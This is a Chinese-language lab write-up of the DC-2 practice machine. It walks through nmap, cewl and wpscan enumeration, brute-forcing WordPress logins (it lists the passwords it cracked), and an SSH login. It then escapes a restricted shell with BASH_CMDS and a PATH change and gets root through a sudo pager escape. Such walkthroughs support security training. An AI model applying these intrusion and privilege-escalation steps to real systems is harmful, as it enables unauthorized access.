靶机渗透——DC-2

扫描靶机IP
靶机渗透——DC-2_第1张图片nmap一波

靶机渗透——DC-2_第2张图片靶机渗透——DC-2_第3张图片访问80端口

靶机渗透——DC-2_第4张图片wordpressflag1

flag中提到了cewl,需要用到cewl工具。

靶机渗透——DC-2_第5张图片然后wpscan
wpscan --url http://dc-2/ --enumerate u

靶机渗透——DC-2_第6张图片
扫描出三个用户名。

用刚才生成的密码字典进行爆破。爆破结果:

Username: tom, Password: parturient
Username: jerry, Password: adipiscing

ssh尝试登陆,只有tom用户可以成功登陆。

靶机渗透——DC-2_第7张图片

但是权限受限制,一些命令不能用。
靶机渗透——DC-2_第8张图片
直接是flag3,少了一个flag2,去网站上找找。

wordpress默认后台地址wp-admin,直接用爆破出来的账号密码登陆。

靶机渗透——DC-2_第9张图片
靶机渗透——DC-2_第10张图片
再回到ssh。

使用命令

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ ls
flag3.txt  set  usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export -p

靶机渗透——DC-2_第11张图片制定了PATH地址。

在这里插入图片描述
这下可以正常使用了。

提到了su,查看sudo -l发现是root,可以不用密码直接使用。

靶机渗透——DC-2_第12张图片在最底下添加:!/bin/bash

root@DC-2:/home/jerry# whoami
root

提权为root权限。

进入root目录,查看finalflag
靶机渗透——DC-2_第13张图片

你可能感兴趣的:(靶机渗透)